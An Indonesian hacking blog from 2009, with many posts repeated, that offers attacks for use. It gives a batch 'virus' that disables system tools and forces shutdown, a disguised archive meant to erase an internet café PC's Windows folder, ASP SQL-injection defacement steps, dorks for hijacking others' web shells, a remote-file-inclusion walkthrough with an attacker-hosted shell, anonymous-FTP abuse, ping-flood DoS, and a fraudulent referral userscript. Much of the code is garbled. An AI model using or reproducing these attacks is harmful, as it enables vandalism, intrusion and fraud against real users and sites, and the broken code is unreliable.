Maaf, saya terlambat kasih tau, situs saya diganti domainnya ke http://www.neodark.co.tv/
Blog ini akan saya tutup atau saya akan jadikan redirection.
Sekian dan terimakasih
Hormat
ne0 d4rk fl00d3r aka undead_h4x0r
Minggu, 27 Desember 2009
Selasa, 03 November 2009
Ganti hosting...
Maaf, ya, situs www.darknezzhacker.co.cc ditutup sementara, karena ada pemindahan hosting ya!
Maaf sekali, mungkin saya akan ganti ke Wordpress...
OK, dan penutupan ini bakal dimulai, kapan yak? gak tau juga sih, yang penting, kalo gak bisa diakses www.darknezzhacker.co.cc , domain sementara adalah darknezzhacker.blogspot.com
Maaf sekali, mungkin saya akan ganti ke Wordpress...
OK, dan penutupan ini bakal dimulai, kapan yak? gak tau juga sih, yang penting, kalo gak bisa diakses www.darknezzhacker.co.cc , domain sementara adalah darknezzhacker.blogspot.com
Sabtu, 31 Oktober 2009
Bikin Virus Sederhana yuk!
Virus Development udah males dah di utak-atik lagi... jadi, kita bahas virus disini aja yak...
OK, sekarang kita buka notepad, lalu copas yang dibawah ini:
Echo off
If no exist c:\windows\%0copy0% c:\windows
For %%p in(A C D E F) do copy%0 %%p:
For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat
For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r
REG ADD HKCU\Software\Microsoft\Windows\currentVersion\
Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFind /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/ vNoRun /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f
REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/DisableRegistryTools /t REG_DWORD/d 1/f
Shutdown –sd –t 60 –c “Nothing is Secure in this Cyber World, because, nothing's perfect... by ne0 d4rk fl00d3r”-f
Exit
Heheheehehe... yaudah, selamat mencoba!!!
P.S. Kalo mau masukin virusnya lewat flash disk bisa pakek Autorun.inf atau pakek RAR auto start.
---END---
Thanks to: jombi_par
Sumber: http://rahmatvinacerpus.wordpress.com
OK, sekarang kita buka notepad, lalu copas yang dibawah ini:
Echo off
If no exist c:\windows\%0copy0% c:\windows
For %%p in(A C D E F) do copy%0 %%p:
For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat
For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r
REG ADD HKCU\Software\Microsoft\Windows\currentVersion\
Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFind /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/ vNoRun /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f
REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/DisableRegistryTools /t REG_DWORD/d 1/f
Shutdown –sd –t 60 –c “Nothing is Secure in this Cyber World, because, nothing's perfect... by ne0 d4rk fl00d3r”-f
Exit
Heheheehehe... yaudah, selamat mencoba!!!
P.S. Kalo mau masukin virusnya lewat flash disk bisa pakek Autorun.inf atau pakek RAR auto start.
---END---
Thanks to: jombi_par
Sumber: http://rahmatvinacerpus.wordpress.com
Jumat, 30 Oktober 2009
Lock Web
Nah, kemaren kan sudah diceritakan tentang Localhost Manipulation, nah, sekarang kita pakek File HOST untuk meng-lock website...
Tutorial:
1. Buka C:\WINDOWS\system32\drivers\etc
2. Buka file HOST dengan Notepad
3. Akan keluar seperti ini kan:
4. Buka aja Facebook sekarang, nanti ada tulisan seperti ini:
Sekian......
---END---
Thanks to: SATANIC_H4X0R
Tutorial:
1. Buka C:\WINDOWS\system32\drivers\etc
2. Buka file HOST dengan Notepad
3. Akan keluar seperti ini kan:
# Copyright (c) 1993-1999 Microsoft Corp.Tambahin bawahnya 127.0.0.+1 diatasnya spasi link yang mau dilock, contohnya jadinya begini:
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
# Copyright (c) 1993-1999 Microsoft Corp.Dan seterusnyah........ abis itu, jangan lupa disave!
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.2 http://www.facebook.com
127.0.0.3 http://www.google.com
127.0.0.4 http:/www.kaskus.us
4. Buka aja Facebook sekarang, nanti ada tulisan seperti ini:
Unable to connectSama halnya dengan Google, dan Kaskus, tulisannya mirip-mirip lah... ^_^
Firefox can't establish a connection to the server at http://www.facebook.com
* The site could be temporarily unavailable or too busy. Try again in a few
moments.
* If you are unable to load any pages, check your computer's network
connection.
* If your computer or network is protected by a firewall or proxy, make sure
that Firefox is permitted to access the web
Sekian......
---END---
Thanks to: SATANIC_H4X0R
Selasa, 27 Oktober 2009
Deathly Dork untuk deface...
Akhirnya, setelah sekian lama, saya tidak blogging lagi, karena lupa password blogger gak ada bahan obrolan blogging...
Dan sekarang ada bahan nih, tentang Google Hacking.
Kan kalo mau melakukan Remote File Inclusion aka RFI kan harus nanempadi di sawah shell dan agak susah, kita akan mempelajari RFI cara gampang (dengan cara memakai shell taneman orang lain... :D)
Hanya dengan dork: "c99shell v. 1.0 pre-release build"
Kita bisa mendapatkan shell taneman orang laen... :D
Lalu kita langsyungz take over ajah... :D :D :D
Sekian...
---END---
Thanks to: cybermutaqqin
Dan sekarang ada bahan nih, tentang Google Hacking.
Kan kalo mau melakukan Remote File Inclusion aka RFI kan harus nanem
Hanya dengan dork: "c99shell v. 1.0 pre-release build"
Kita bisa mendapatkan shell taneman orang laen... :D
Lalu kita langsyungz take over ajah... :D :D :D
Sekian...
---END---
Thanks to: cybermutaqqin
Sabtu, 24 Oktober 2009
ASP Injection
Kita akan mempelajari ASP
Tutorial aja deh langsyungz.................
1. Cari target dulu dengan dork: inurl:default.asp?newsID=
2. Misalnya dapet target www.situs.com/default.asp?newsID=123
3. Tambain ' (single quote) dibelakang angka, akan keluar seperti ini:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′4. Jika keluar kata-kata diatas, maka, kita tambahin ini untuk mencari bugnya: having 1=1 . jadinya begini: www.situs.com/default.asp?newsID=123 having 1=1 maka keluarnya adalah:
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 ” 之前有未闭合的引号
/new_show.asp,行 89
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′5. Ketemu columnnya kan? ntuh dia si main.id
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.id’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
6. Masukin dibelakangnya: group by "column-nya" having 1=1;– Columnnya diganti column yg diatas itu, dalam kasus ini, columnnya main.id jadi begini: www.situs.com/default.asp?newsID=123 group by main.id having 1=1;– maka keluarnya adalah:
Microsoft OLE DB Provider for ODBC Drivers 错误 ‘80040e14′7. Ketemu titlenya... hehehehe.... (yang 'main.title')
[Microsoft][ODBC SQL Server Driver][SQL Server]列 ‘main.title’ 在选择列表中无效,因为该列既不包含在聚合函数中,也不包含在 GROUP BY 子句中。
/new_show.asp,行 89
8. Langsung aja Update dengan menambahkan: update main set title=’hacked by YOU’ jadinya, URLnya begini: www.situs.com/default.asp?newsID=123 update main set title='hacked by YOU' dan liat halaman utamanya.........
Sekian....
---END---
Thanks to: anak|jendral, Jo2, Hmei7, SATANIC_H4XOR
Rabu, 21 Oktober 2009
Desain Logo Tecon (isenk-isenk...)
Kemaren ada sayembara membuat logo tecon, jadi saya bikin aja dah... :D
Selamat menikmati... (HALAH! emank makanan??? ^_^)
---END---
Selamat menikmati... (HALAH! emank makanan??? ^_^)
---END---
Minggu, 18 Oktober 2009
FTP Attack
FTP (File Transfer Protocol) adalah Protocol khusus untuk File Transferring, jadi, FTP tidak bisa diakses lewat HTTP Protocol...
FTP Attack mengandalkan kelalaian admin dan kelalaian itu bisa membuat attacker Upload Download di FTP secara seenaknya dengan "Anonymous User"
Bagaimanakah caranya?
Letz go to Tutorialz...
1. Buka CMD aka Command Prompt
2. ketik di cmd ftp situs target.anda misalnya: ftp darknezzhacker.co.cc (maaf, blog saya gak bisa diserang! ^_^) tanpa www ya!
3. Jika yang keluar ini:
Connected to situstarget.com.
220---------- Welcome to PureFTPd 1.0.12 ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 15:21 and the load is 0.03. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (situstarget.com:(none)):
Berarti kamu beruntung dan bisa masuk
Kalo yang keluar seperti ini:
Connected to situstarget.com.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:31. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 30 minutes of inactivity.
User (situstarget.com:(none)):
atau ini:
Connected to situstarget.com.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:119.235.18.72]
User (situstarget.com:(none)):
Berarti gak bisa :( cari target lain okay?
4. Jika tampilannya seperti paling atas, berarti anda bisa masuk sebagai "Anonymous User" cara masuknya adalah isikan User Anonymous dan Password kosongkan saja...
5. Sudah masuk? OK, terserah apa kata hati anda, anda bisa melakukan Upload atau Download, atau liat-liat Directory dengan command-command yang sudah dirangkum disini: FTP Command maaf ya kalo bahasa
OK, sekian dulu yaah...
---END---
Thanks to: Ciebal dan S'to (lewat Bukunya: CEH)
Jumat, 16 Oktober 2009
Enskripsi File menjadi image
Dari Ciebal...
Bagaimana cara memasukkan file rar ke file gambar?
Sangat gampang... hanya bermodal CMD aka Command Prompt dan pastinya file-file sepert:
- file.rar (ato terserah)
- format.gif
- hasil.gif
(semuanya tempatkan di desktop)
Tutorial:
1. buka cmd
2. ketik cd desktop (untuk mengarahkan cmd ke desktop)
3. lalu ketik: copy /b format.gif+file.rar hasil.gif
4. klikz Enter
5. dan TA-DA! selesai deh... di hasil.gif sekarang terdapat file.rar untuk melihat hasilnya, klik kanan hasil.gif dan open with WinRAR
OK sekianz...
---END---
Sumber: www.ciebal.web.id
Thanks to: Hacker Center and Ciebal
Bagaimana cara memasukkan file rar ke file gambar?
Sangat gampang... hanya bermodal CMD aka Command Prompt dan pastinya file-file sepert:
- file.rar (ato terserah)
- format.gif
- hasil.gif
(semuanya tempatkan di desktop)
Tutorial:
1. buka cmd
2. ketik cd desktop (untuk mengarahkan cmd ke desktop)
3. lalu ketik: copy /b format.gif+file.rar hasil.gif
4. klikz Enter
5. dan TA-DA! selesai deh... di hasil.gif sekarang terdapat file.rar untuk melihat hasilnya, klik kanan hasil.gif dan open with WinRAR
OK sekianz...
---END---
Sumber: www.ciebal.web.id
Thanks to: Hacker Center and Ciebal
UserScript untuk mencurangi KumpulBlogger
Sering banged yea saya ngisengin system... tapi inilah nafsu seorang Newbie... (Halah! apa sih? wkwkwk...)
Taudah, kita akan bahas caranya...
Jadi, tadi itu gempa... (Halah! Udah! Udah! jangan bahas gempa deh...)
OK, it's time to serious! Jadi, kita akan sedikit Social Engineering kepada beberapa orang... (sedikit nakal) menarik orang-orang untuk memakai UserScript kita!
Misalnya:
- Kamu promosiin UserScript kamu di Facebook dengan kedok bisa ganti template facebook, dll.
- Di MafiaWars fans, dengan kedok UserScript Bots
- Di Travian Cheater ato Travian Fans dengan kedok untuk bermain Travian dengan mudah...
- dan laen-laen
Saya mendapat ide ini dari Cruz3N Tecon yang membuat Klik Otomatis KumpulBlogger tapi saya akan membahas tentang trik saya sendiri...(saya harus tetap eksiz...
)Wokeh, letz go tentang logikanya
Kita akan redirect pengguna dari Facebook dan penjuru subdomain dan sejuta pagenya, lalu google, fiendster, my space, youtube,
Lalu anda buat suatu file di Notepad, Source Code:
// ==UserScript==
// @name KumpulBlogger
// @author ne0 d4rk fl00d3r
// @description XWET
// @include *.facebook.com/*
// @include www.facebook.com
// @include *google.*/*
// @include www.youtube.com/*
// @include *.friendster.com/*
// ==/UserScript==
document .location="javascript:popUpWindow('URL reff KumpulBlogger anda', 0, 0, 536, 580)"
Wkwkwk, ntuh script untuk buka pop-up window yang keluar adalah reff Link KumpulBlogger anda kan bakal makin kaya... wkwkwk....
OK, sekian dah...
---END---
Selasa, 13 Oktober 2009
Keyboard Rusak?
Tadi ada sedikit kepanikan yaitu Keyboard Komputer saya rusak, sementara pembantu saya pergi beli batere, saya masih berselancar, ada 2 cara untuk mengetik URL tanpa keyboard:
1. Virtual Keyboard
Tau kan Virtual Keyboard? Kita bisa mengetik dengan mengklik tombol-tombol di monitor...
2. Copy-Paste Technique
Baru tau tekhnik ini? Tekhnik ini adalah tentang Copy-Paste huruf-huruf yang bertebaran di komputermu, contoh: kamu ke HELP di app apa aja, trus anda copas aja hurufnya atu2 ke address bar... (HEHEHE)
"Wow! Trik bodoh tapi berguna..."
~ Somebody to ne0 d4rk fl00d3r
Udah dulu yeah...
(Mau belajar dulu, besok masih UTS, doakan aku teman-teman... ^_^)
---END---
1. Virtual Keyboard
Tau kan Virtual Keyboard? Kita bisa mengetik dengan mengklik tombol-tombol di monitor...
2. Copy-Paste Technique
Baru tau tekhnik ini? Tekhnik ini adalah tentang Copy-Paste huruf-huruf yang bertebaran di komputermu, contoh: kamu ke HELP di app apa aja, trus anda copas aja hurufnya atu2 ke address bar... (HEHEHE)
"Wow! Trik bodoh tapi berguna..."
~ Somebody to ne0 d4rk fl00d3r
Udah dulu yeah...
(Mau belajar dulu, besok masih UTS, doakan aku teman-teman... ^_^)
---END---
Senin, 12 Oktober 2009
Destroy the Admin's Computer!!! plus seisi Warnet!
Wew, ada trick baru neeh tapi Untested dan 30% kita ikut menjadi korban :'(
Tapi itu bisa dibayar dengan "mungkin" warnet gratis atau kehancuran warnet (karena kompi admin harus install ulang)
KHUSUS UNTUK ORANG-ORANG BERKEPERLUAN UNTUK MENGHANCURKAN WARNET!!! (Tapi maaf, saya tidak bertanggung jawab bila ada kesalahan... No Pain, No Gain akagak ada si Pain, gak bakal jadi kuat loe... Gak ada luka ya gak bakal maju)
To de poin...
OK, pertama kita buat file cmd dl0, dengan Notepad, isinya:
erase C:WINDOWS
lalu save dengan nama: tugas.cmd (nama untuk penyamaran supaya gak dicurigain sebagai "destroyer file")
Lalu, trik supaya nyala ntuh file, maka kita masukkan kedalam file RAR dan diset begini:
- Supaya anda gak dicurigain, supaya ada file buat kedok print, jadi loe masukin file menyerupai tugas seperti copas artikel yang berguna, trus kamu jadiin RAR (satuin sama tugas.cmd) misalkan namanya tugas.doc dan laen-laen
- Pilih tugas.cmd dan tugas.doc lalu klik kanan pada file lalu klik WinRAR lalu pilih Add to Archive
- Isi Archive name terserah (mungkin tugas.exe atau apalah...) lalu centang Create SFX Archive
- Klik Tab Advanced lalu klik tombol SFX Options... lalu isikan Path to Extract jadinya C:/Documents and Settings lalu Isikan "Run after Extraction" "tugas.cmd"
- Lalu klik tab Modes lalu pilih opsi Hide All dan Overwrite all files
- Klik OK untuk memulai Packing!
Mulailah sedikit Soceng (hehehe, ini adalah aksi yang paling menegangkan, kalo gagal, ya paling kamu diblack-list ama admin... dan gatot dah... (gagal total))
HACKER vs Operator
OK, anda pura-pura pengen print, dialognya kayak gini:
Ket: H: Kamu Op: Operator
H: Mas, mau ngeprint (sambil menyodorkan flash disk)
Op: (Colok flash disk) Filenya yang mana de?
H: Yang tugas tapi diextract dulu
Op: (extract)
H: Kayaknya langsung diextract ke Documents and Settings deh...
---File cmd attack---
---Print---
H: Trima kasih
Abis itu Warnet pun Game Over setelah restrart (ato langsung? gak tau juga deh...)
===GAME OVER===
OK, selesailah sudah Wicked Trick ini
Selamat Menghancurkan...
---END---
Thanx to Ichito-Bandito dan SpyroKiD
Tapi itu bisa dibayar dengan "mungkin" warnet gratis atau kehancuran warnet (karena kompi admin harus install ulang)
KHUSUS UNTUK ORANG-ORANG BERKEPERLUAN UNTUK MENGHANCURKAN WARNET!!! (Tapi maaf, saya tidak bertanggung jawab bila ada kesalahan... No Pain, No Gain aka
To de poin...
OK, pertama kita buat file cmd dl0, dengan Notepad, isinya:
erase C:WINDOWS
lalu save dengan nama: tugas.cmd (nama untuk penyamaran supaya gak dicurigain sebagai "destroyer file")
Lalu, trik supaya nyala ntuh file, maka kita masukkan kedalam file RAR dan diset begini:
- Supaya anda gak dicurigain, supaya ada file buat kedok print, jadi loe masukin file menyerupai tugas seperti copas artikel yang berguna, trus kamu jadiin RAR (satuin sama tugas.cmd) misalkan namanya tugas.doc dan laen-laen
- Pilih tugas.cmd dan tugas.doc lalu klik kanan pada file lalu klik WinRAR lalu pilih Add to Archive
- Isi Archive name terserah (mungkin tugas.exe atau apalah...) lalu centang Create SFX Archive
- Klik Tab Advanced lalu klik tombol SFX Options... lalu isikan Path to Extract jadinya C:/Documents and Settings lalu Isikan "Run after Extraction" "tugas.cmd"
- Lalu klik tab Modes lalu pilih opsi Hide All dan Overwrite all files
- Klik OK untuk memulai Packing!
Mulailah sedikit Soceng (hehehe, ini adalah aksi yang paling menegangkan, kalo gagal, ya paling kamu diblack-list ama admin... dan gatot dah... (gagal total))
HACKER vs Operator
OK, anda pura-pura pengen print, dialognya kayak gini:
Ket: H: Kamu Op: Operator
H: Mas, mau ngeprint (sambil menyodorkan flash disk)
Op: (Colok flash disk) Filenya yang mana de?
H: Yang tugas tapi diextract dulu
Op: (extract)
H: Kayaknya langsung diextract ke Documents and Settings deh...
---File cmd attack---
---Print---
H: Trima kasih
Abis itu Warnet pun Game Over setelah restrart (ato langsung? gak tau juga deh...)
===GAME OVER===
OK, selesailah sudah Wicked Trick ini
Selamat Menghancurkan...
---END---
Thanx to Ichito-Bandito dan SpyroKiD
Minggu, 11 Oktober 2009
Anti Facebook
Yeah, ada lagi nih UserScript gendeng dari saya...
Anti Facebook yaitu Script untuk mendeny website Facebook dengan meredirect ke www.google.com (beserta IP server dan segala penjuru subdomainnya)
Kegunaan:
- Kalo dikantor biasanya kita harus ngeblock fb supaya kinerja karyawan dan karyawati meningkat
- Triple Protection:
+ Block situs facebook dari access
+ Block IP server facebook dari access
+ Block lewat UserScript gw
Install aja dari sini: Anti Facebook
---END---
Anti Facebook yaitu Script untuk mendeny website Facebook dengan meredirect ke www.google.com (beserta IP server dan segala penjuru subdomainnya)
Kegunaan:
- Kalo dikantor biasanya kita harus ngeblock fb supaya kinerja karyawan dan karyawati meningkat
- Triple Protection:
+ Block situs facebook dari access
+ Block IP server facebook dari access
+ Block lewat UserScript gw
Install aja dari sini: Anti Facebook
---END---
Sabtu, 10 Oktober 2009
Directoryku yang baru
Curhat dulu yuk!
Tadi pas pengen upload shell-shell yang gw dapet di 000webhost, tapi kalo pakek ftpnya dia harus pakek domain laen, gak bisa pakek domain gratisannya dia :'( Harus pakek domain laen... Pas diregist di .co.cc, trus gw bingung cara pakek domainnya di 000webhost, gw harusnya ngesetnya pas pertama kali gw bangun ntuh website, yaudah, gw masukin ke parked domain en, malemnya, JREEENG!!!
....
.....
Bisa? GAK BISA!!! tetep yang keluar ngaco!! shell gw gak bisa dibuka (NTOD!)
Yaudah, segeralah tinggalkan 000webhost yang sedikit sinting tersebut dan memulaihidup baru di freehostia eit, freehostia terlalu aneh, soalnya suka delete website orang yang gak berdosa... (yang gak berdosa aja didelete, apalagi web yang isinya shell semua?) jadi, memulai lagi di ucoz (sama aje donk...)
OK, kalian bisa ambil shell dari website saya (gratis!*)
*Belum termasuk biaya akses internet (^_^)
OK, langsung aja ke TKP gan... Neo Directories
---END---
Tadi pas pengen upload shell-shell yang gw dapet di 000webhost, tapi kalo pakek ftpnya dia harus pakek domain laen, gak bisa pakek domain gratisannya dia :'( Harus pakek domain laen... Pas diregist di .co.cc, trus gw bingung cara pakek domainnya di 000webhost, gw harusnya ngesetnya pas pertama kali gw bangun ntuh website, yaudah, gw masukin ke parked domain en, malemnya, JREEENG!!!
....
.....
Bisa? GAK BISA!!! tetep yang keluar ngaco!! shell gw gak bisa dibuka (NTOD!)
Yaudah, segeralah tinggalkan 000webhost yang sedikit sinting tersebut dan memulai
OK, kalian bisa ambil shell dari website saya (gratis!*)
*Belum termasuk biaya akses internet (^_^)
OK, langsung aja ke TKP gan... Neo Directories
---END---
Penghancuran Warnet (Hanya sedikit pemikiran dari otak kami)
Gambar diatas adalah sedikit pemikiran saya dan teman saya di Tecon (Sebenernya temen satu sekolah ^_^) yang namanya Criszz (Nama Handle) Memang hancur gambarnya, dan saya akan menjelaskannya:
1. Satu orang utusan Hacker pergi ke warnet target. (Pastikan warnet target memakai LAN)
2. Utusan Hacker itu mendapatkan IP address
3. Utusan Hacker itu mengirimkan IP Address ke komputer Hacker
4. Hacker mendapat IP address (misalnya IP address-nya: 111.666.230.81)
5. Karena warnet itu memakai LAN, mereka punya 1 IP Address untuk 7 komputer (di gambar)
6. Hacker melakukan DoS ke target dengan memasukkan
7. Koneksi Warnet pun lumpuh... dan...
Warnetnya sudah game over (kalo si Hacker baek sih, gak game over ^_^) tergantung Hackernya, kalo jahat ya didiemin terus sampe besok pagi... :D
Jadi, saya juga mengajarkan tentang DoS dengan Command Prompt yaitu dengan memakai command ini: ping IP -l 65500 -n 10000000 -w 0.00001
IP diganti IP target.
Dijamin jaringan internet dia lumpuh dan game over
NOTE: Bisa juga targetnya website!
---END---
Kamis, 08 Oktober 2009
UserScript Anti Tunggu Download Free User Rapidshare dan 4shared
Setelah 3 Hari membuat UserScript buat akalin Timernya Rapidshare secara Otomatis (Thx to SpyroKiD)
Karena Judulnya aneh, mohon dimaklumi, karena saya tidak terlalu pintar untuk membuat judul yang pas...
History Version UserScript (from zero to HERO :D) dari waktu ke-waktu:
1. Cuma pakek JavaScript ini: javascript:alert(c=0) ternyata gagal karena JavaScript itu aktif pertama kali lalu Timernya telat keluarnya, jadi gak bisa dijadiin 0 deh...
2. Pakek JavaScript sleep() dan wait() (Untuk tunggu sebelum JavaScript aktif) ternyata gak bisa karena gw gak bisa pakek javascriptnya...
3. Yang berhasil: pakek redirection! redirectnya ke javascript:alert(c=0) (Hahaha)
Itulah historynya... dan saya akan membagikannya untuk anda semua sekalian...
USERSCRIPTNYA
Sudah dulu yeah...
---END---
Thanks to: SpyroKiD yang udah kasih tau tentang kelemahan Rapidshare...
Karena Judulnya aneh, mohon dimaklumi, karena saya tidak terlalu pintar untuk membuat judul yang pas...
History Version UserScript (from zero to HERO :D) dari waktu ke-waktu:
1. Cuma pakek JavaScript ini: javascript:alert(c=0) ternyata gagal karena JavaScript itu aktif pertama kali lalu Timernya telat keluarnya, jadi gak bisa dijadiin 0 deh...
2. Pakek JavaScript sleep() dan wait() (Untuk tunggu sebelum JavaScript aktif) ternyata gak bisa karena gw gak bisa pakek javascriptnya...
3. Yang berhasil: pakek redirection! redirectnya ke javascript:alert(c=0) (Hahaha)
Itulah historynya... dan saya akan membagikannya untuk anda semua sekalian...
USERSCRIPTNYA
Sudah dulu yeah...
---END---
Thanks to: SpyroKiD yang udah kasih tau tentang kelemahan Rapidshare...
Senin, 05 Oktober 2009
Tutorial RFI (Yang ditunggu-tunggu dan dinanti-nanti)
Akhirnya Update juga, setelah jalan-jalan dari Yogyacarderlink (ternyata isinya orang gila semua! piis om-om gay dari Yogyacarder! ^_^ Ane gak maksud untuk menjelek-jelekkan ^_^ ^_^ ^_^)
RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)
Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E
Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untukmeminumnya 3x sehari supaya efeknya 100% memakai hosting 000webhost.com atawa freewebtown.com kalo gak mau suspend dengan cepat dan mudah, sangat tidak dianjurkan untuk bertemu Roy Suryo memakai freehostia karena menurut para gay warga Yogyacarderlink freehostia upload shell langsung disuspend... lalu anda catet URL-nya, nanti bakal dipakek)
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
Thanks to: kiddies dan ycl dari Yogyacarderlink
Sumber: yogyacarderlink.web.id
RFI adalah: Remote File Inclusion, yaitu Suatu teknik Hacking dengan meng-include-kan file ke suatu website yang ada bug RFI-nya lewat backdoor (jalur belakang aka pintu belakang)
Macam-macam Backdoor aka Web Shell:
1. c99.txt
2. c100.txt
3. r57.txt
4. ekin0x
5. locus7
Darimana anda bisa mendapatkannya yaitu tempat yang hanya 6 huruf: G-O-O-G-L-E
Tutorialz:
1. Sebelum melakukan RFI, ada baiknya kita persiapkan diri:
- Berdoa menurut kepercayaan masing-masing
- Web Browser
- Shell yang udah didapatkan (kalo dapet dari punya orang laen, mending dicatet URL-nya, soalnya kita bakal pakek buat RFI-nya, kalo punya sendiri, upload dulu ke hostingan dan saya anjurkan untuk
- akses ke milw0rm/Kumpulan Bug RFI (dipilih aje atu2)
2. Buka milw0rm lalu cari bug RFI (di search ketik: RFI) lalu ambil salah satu bug RFI.... atawa kalo udah dapet bug RFI, yaudah...
3. Search digoogle Bugsnya misal exploitna: admin/aaa/direktori/direktori2/file=[shell] ya carinya inurl:admin/aaa/direktori/direktori2/file=
4. Comot satu target (bahasanya ambhuradhul) misalnya dapet: www.target.com/admin/aaa/direktori/direktori2/file=tolol.txt
5. Ganti tolol.txt jadi URL shellnya, jadinya begini: www.target.com/admin/aaa/direktori/direktori2/file=www.situsgue.hosting.com/shell/c99.txt? (jangan lupa ditambah "?" tanpa tanda kutip (Tanda tanya))
6. Kalo gak keluar shellnya (ada fasilitas Upload dan buat Masukin Codenya, pokoknya mirip-mirip FTP Manager gituu...) berarti gak vuln lagi, jangan sedih dan marah, cari aja yang laen... ^_^ kalo keluar shellna, lanjoet aje... tinggal kita takeover ntu wepsait... (NGIHAHAHAHAHA!!!)
7. Kita pakek command-command berikut buat takeover:
Uname -a = Melihat jenis or nama server or type server yg di gunakan !!!!
cat /etc/issue = melihat jenis kernel dari suatu server !!!!
curl -o , wget , lwp-download = mendownload sebuah file
find = mencari ( tampilkan , temukan )
8. Terserah mahu ngapain (logatnya mulai agak najis... ^_^)
---END---
